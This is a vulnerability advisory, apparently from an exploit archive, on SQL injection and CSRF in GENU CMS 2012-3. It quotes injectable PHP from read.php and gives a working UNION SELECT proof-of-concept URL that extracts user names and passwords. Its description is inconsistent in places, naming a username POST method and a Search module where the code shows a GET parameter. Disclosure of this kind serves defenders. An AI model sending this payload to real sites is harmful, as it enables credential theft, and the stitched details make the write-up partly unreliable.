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GENU CMS SQL Injection Vulnerability

Security Risk High
web applications
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GENU CMS SQL Injection Vulnerability
bug found by h0rd h0rd[at]null.net
homepage http://h0rd.net
download http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz
vulnerability in read.php
vuln code:
if (isset($_GET['article_id']))
    $sql->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name
                 FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . '
                 WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id
                 AND ' . TABLE_ARTICLES . '.article_id = ' . $_GET['article_id']);
    $table_articles = $sql->fetch();
PoC exploit:
http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--

A remote SQL Injection vulnerability is detected in GENU CMS 2012-3 content management system.
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands 
on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
The vulnerability is located on the username post method.

Vulnerable Module(s):
				[+] Search - news_subject

--- SQL Exception Logs ---
Error in query  SELECT genu_categories.category_id, genu_categories.category_image, 
genu_categories.category_name, genu_news.news_comments, genu_news.news_date, 
genu_news.news_id, genu_news.news_source, genu_news.news_subject, genu_news.news_text, 
genu_users.user_id, genu_users.user_name FROM genu_categories, genu_news, genu_users WHERE 
genu_categories.category_id = genu_news.category_id AND genu_categories.category_level IN 
( 0 ,  2 ) AND genu_news.news_active =  1  AND genu_news.user_id = genu_users.user_id AND 
LOWER(genu_news.news_subject-1 ) LIKE  %news%  ORDER BY news_date DESC LIMIT 0, 30 

A csrf vulnerability is detected in GENU CMS 2012-3 content management system. The vulnerability allows
an remote attacker to delete with medium required user inter action administrator, moderator & users without 
checkbox or confirmation by the admin itself.

Vulnerable Module(s):
				[+] Delete User

#  0day.today [2024-12-26]  #